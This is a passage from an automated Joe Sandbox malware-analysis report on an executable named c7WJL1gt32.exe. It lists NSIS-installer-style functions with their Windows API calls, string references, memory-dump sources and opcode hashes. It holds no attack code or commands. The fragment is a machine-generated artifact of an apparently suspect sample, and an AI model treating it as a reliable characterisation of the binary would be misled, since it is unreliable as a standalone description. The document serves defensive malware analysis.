                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse90B2.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nse90B2.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nse90B2.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWidelstrlen
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nse90B2.tmp$C:\Users\user\AppData\Local\Temp\nse90B2.tmp\System.dll
                                                                                                          • API String ID: 3109718747-405848883
                                                                                                          • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                          • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                          • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                          • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2464950937.000000006CF11000.00000020.00000001.01000000.00000004.sdmp, Offset: 6CF10000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2464871451.000000006CF10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2464976083.000000006CF14000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2465039264.000000006CF16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6cf10000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeGlobal
                                                                                                          • String ID:
                                                                                                          • API String ID: 2979337801-0
                                                                                                          • Opcode ID: 71fd93853b672ccf9ccb415b7e80faac74cd1a8eb05bb8800a0d813a27972080
                                                                                                          • Instruction ID: a0780087f84ff8566c3eb6d8175130a3ce064a9438b357ce68e2ee6748a29c46
                                                                                                          • Opcode Fuzzy Hash: 71fd93853b672ccf9ccb415b7e80faac74cd1a8eb05bb8800a0d813a27972080
                                                                                                          • Instruction Fuzzy Hash: 35511633D0C0599A8B289FA9C4806AEBFF5EF6631CF14C359D410A3E40D771EE8587A5
                                                                                                          APIs
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6CF124D6
                                                                                                            • Part of subcall function 6CF1122C: lstrcpynW.KERNEL32(00000000,?,6CF112DF,00000019,6CF111BE,-000000A0), ref: 6CF1123C
                                                                                                          • GlobalAlloc.KERNEL32(?), ref: 6CF1245C
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6CF12477
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2464950937.000000006CF11000.00000020.00000001.01000000.00000004.sdmp, Offset: 6CF10000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2464871451.000000006CF10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2464976083.000000006CF14000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2465039264.000000006CF16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6cf10000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                          • String ID:
                                                                                                          • API String ID: 4216380887-0
                                                                                                          • Opcode ID: 1f7b7e798ab1f1751e9ee6e59c0e3f76b0922a7513d95f7ffbced6e47111ff40
                                                                                                          • Instruction ID: 0760cd0c541c4d42ad8e7daf5c9887518a90ba4daa7d66e79aa8a930af8d35d0
                                                                                                          • Opcode Fuzzy Hash: 1f7b7e798ab1f1751e9ee6e59c0e3f76b0922a7513d95f7ffbced6e47111ff40
                                                                                                          • Instruction Fuzzy Hash: F641EFB150C349DFD714DFA5D848A6777B8EB9B314F20891DE04687E81EB32A449CBA1
                                                                                                          APIs
                                                                                                          • GetDC.USER32(?), ref: 00401DBC
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                          • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 3808545654-0
                                                                                                          • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                          • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                          • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                          • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                          APIs
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6CF121EC,?,00000808), ref: 6CF11635
                                                                                                          • GlobalAlloc.KERNEL32(?,00000000,?,00000000,6CF121EC,?,00000808), ref: 6CF1163C
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6CF121EC,?,00000808), ref: 6CF11650
                                                                                                          • GetProcAddress.KERNEL32(6CF121EC,00000000), ref: 6CF11657
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6CF11660
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2464950937.000000006CF11000.00000020.00000001.01000000.00000004.sdmp, Offset: 6CF10000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2464871451.000000006CF10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2464976083.000000006CF14000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2465039264.000000006CF16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6cf10000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1148316912-0
                                                                                                          • Opcode ID: 5f966f6bd3d11f155fdbb1c3099a1951821466176b74bef58f25594fb38b3863
                                                                                                          • Instruction ID: a77662f407f62c461d1bb4a5626214d8d620cd52be95194a3149079930b948b6
                                                                                                          • Opcode Fuzzy Hash: 5f966f6bd3d11f155fdbb1c3099a1951821466176b74bef58f25594fb38b3863
                                                                                                          • Instruction Fuzzy Hash: BAF012726161387FDA2016A78C4DD9B7EACDFCB6F9B120225F6189219085618D01DBF1
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1849352358-0
                                                                                                          • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                          • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                          • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                          • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                          APIs
                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Timeout
                                                                                                          • String ID: !
                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                          • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                          • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                          • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                          • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,?,0000000A), ref: 00405CC3
                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,?,0000000A), ref: 00405CCD
                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000006,?,0000000A), ref: 00405CDF
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                          • API String ID: 2659869361-3081826266
                                                                                                          • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                          • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                          • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                          • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                          APIs
                                                                                                          • GlobalFree.KERNEL32(00732268), ref: 00401BE7
                                                                                                          • GlobalAlloc.KERNEL32(?,00000804), ref: 00401BF9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocFree
                                                                                                          • String ID: Call$h"s
                                                                                                          • API String ID: 3394109436-3408907276
                                                                                                          • Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                          • Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
                                                                                                          • Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                          • Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
                                                                                                          APIs
                                                                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                                                                            • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,74DF2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405D76
                                                                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                          • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,74DF2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405E1E
                                                                                                          • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,74DF2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00405E2E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                          • String ID: 0_B
                                                                                                          • API String ID: 3248276644-2128305573
                                                                                                          • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                          • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                          • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                          • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                          Strings
                                                                                                          • Error launching installer, xrefs: 004059E4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                          • String ID: Error launching installer
                                                                                                          • API String ID: 3712363035-66219284
                                                                                                          • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                          • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                          • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                          • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF2EE0,00403A1A,74DF3420,00403819,00000006,?,00000006,?,0000000A), ref: 00403A5D
                                                                                                          • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                          • API String ID: 1100898210-3081826266
                                                                                                          • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                          • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                          • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                          • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\c7WJL1gt32.exe,C:\Users\user\Desktop\c7WJL1gt32.exe,80000000,00000003), ref: 00405D0F
                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\c7WJL1gt32.exe,C:\Users\user\Desktop\c7WJL1gt32.exe,80000000,00000003), ref: 00405D1F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharPrevlstrlen
                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                          • API String ID: 2709904686-224404859
                                                                                                          • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                          • Instruction ID: 65148869c9b5617484fe42b3676c909fd92059a2a8224d2a454660f99163d925
                                                                                                          • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                          • Instruction Fuzzy Hash: A3D0A7B7410920EAD3126B04DC04D9F73ACEF51300B46843BE840A7171D7785CD18BEC
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 6CF1116A
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6CF111C7
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6CF111D9
                                                                                                          • GlobalFree.KERNEL32(?), ref: 6CF11203
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2464950937.000000006CF11000.00000020.00000001.01000000.00000004.sdmp, Offset: 6CF10000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2464871451.000000006CF10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2464976083.000000006CF14000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2465039264.000000006CF16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6cf10000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$Free$Alloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1780285237-0
                                                                                                          • Opcode ID: 149dca9a6e0bddbf5736a97846b8d7bd2e27a3e9251fe941caa050bf48783a80
                                                                                                          • Instruction ID: f39ef68633168aee8a566a784a67d9fd8ff80f05fc70a1ec72150602b86483ba
                                                                                                          • Opcode Fuzzy Hash: 149dca9a6e0bddbf5736a97846b8d7bd2e27a3e9251fe941caa050bf48783a80
                                                                                                          • Instruction Fuzzy Hash: 5231D7B2A192069FDB40CFB8C846B66B7FCEB663247128519E845E7E10E734D804C760
                                                                                                          APIs
                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                          • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
